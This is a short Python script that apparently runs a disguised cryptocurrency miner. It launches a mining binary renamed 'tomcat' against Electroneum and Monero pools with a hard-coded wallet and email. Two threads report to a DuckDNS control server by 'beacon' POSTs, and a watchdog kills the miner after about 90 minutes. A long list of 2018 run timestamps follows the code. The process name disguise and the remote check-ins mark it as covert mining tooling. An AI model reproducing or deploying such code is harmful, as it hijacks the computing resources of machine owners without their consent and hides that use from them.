import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:04.179044
#2018-02-17 16:48:05.018211
#2018-02-17 18:36:06.674492
#2018-02-17 20:25:05.944506
#2018-02-17 22:11:07.529665
#2018-02-17 23:55:06.252340
#2018-02-18 01:46:06.118195
#2018-02-18 03:32:06.388375
#2018-02-18 05:19:05.275140
#2018-02-18 07:11:06.555729
#2018-02-18 08:59:05.343073
#2018-02-18 10:46:01.678199
#2018-02-18 12:33:05.751084
#2018-02-18 14:20:08.088358
#2018-02-18 16:11:03.860132
#2018-02-18 17:59:03.743520
#2018-02-18 19:46:02.270351
#2018-02-18 21:29:06.315832
#2018-02-18 23:18:05.909755
#2018-02-19 01:06:05.596512
#2018-02-19 02:52:04.369375
#2018-02-19 04:39:01.522004
#2018-02-19 06:23:04.645084
#2018-02-19 08:12:06.270319
#2018-02-19 10:02:05.445146
#2018-02-19 11:51:07.098169
#2018-02-19 13:38:06.308934
#2018-02-19 15:27:08.948371
#2018-02-19 17:16:06.567558
#2018-02-19 19:04:07.439711
#2018-02-19 20:52:03.642049
#2018-02-19 22:39:04.300246
#2018-02-20 00:23:07.565972
#2018-02-20 02:11:07.929516
#2018-02-20 04:02:01.653554
#2018-02-20 05:45:12.250454
#2018-02-20 07:31:01.938121
#2018-02-20 09:15:08.923864
#2018-02-20 10:58:04.395196
#2018-02-20 12:45:09.396414
#2018-02-20 14:31:01.623718
#2018-02-20 16:15:07.556935
#2018-02-20 18:01:04.434978
#2018-02-20 19:51:08.488456
#2018-02-20 21:40:04.216480
#2018-02-20 23:21:07.716947
#2018-02-21 01:05:06.370312
#2018-02-21 02:51:04.258600
#2018-02-21 05:45:04.257958
#2018-02-21 07:33:05.448173
#2018-02-21 09:18:05.018130
#2018-02-21 11:06:06.317123
#2018-02-21 12:53:08.690351
#2018-02-21 14:40:02.441190
#2018-02-21 16:27:04.856335
#2018-02-21 18:17:01.925176
#2018-02-21 20:02:02.188081
#2018-02-21 21:49:02.040277
#2018-02-21 23:32:06.041573
#2018-02-22 01:19:01.356770
#2018-02-22 03:09:03.555424
#2018-02-22 04:54:01.768517
#2018-02-22 06:39:04.617016
#2018-02-22 08:27:05.607514
#2018-02-22 10:14:06.550822
#2018-02-22 11:58:06.812761
#2018-02-22 13:45:09.558588
#2018-02-22 15:33:01.547599
#2018-02-22 17:18:05.257805
#2018-02-22 19:04:06.865634
#2018-02-22 20:56:04.235003
#2018-02-22 22:43:01.865205
#2018-02-23 00:32:04.858990
#2018-02-23 02:17:01.347205
#2018-02-23 04:04:05.366802
#2018-02-23 05:51:04.218737
#2018-02-23 07:37:06.720360
#2018-02-23 09:39:07.815819
#2018-02-23 11:44:05.139963
#2018-02-23 13:35:06.884836
#2018-02-23 15:21:01.581078
#2018-02-23 17:08:04.712639
#2018-02-23 18:35:07.518919
#2018-02-23 20:20:07.270868
#2018-02-23 21:56:05.728556
#2018-02-23 23:32:06.910124
#2018-02-24 01:04:05.233728
#2018-02-24 02:44:07.805671
#2018-02-24 04:23:06.600655
#2018-02-24 05:51:01.355216
#2018-02-24 07:29:07.428101
#2018-02-24 09:02:05.326061
#2018-02-24 10:49:07.348287
#2018-02-24 12:36:07.508393
#2018-02-24 14:24:06.729773
#2018-02-24 16:12:01.515969
#2018-02-24 18:04:03.643154
#2018-02-24 19:51:01.579681
#2018-02-24 21:35:01.864196
#2018-02-25 01:58:02.092284
#2018-02-25 05:49:03.820581
#2018-02-25 11:37:05.246777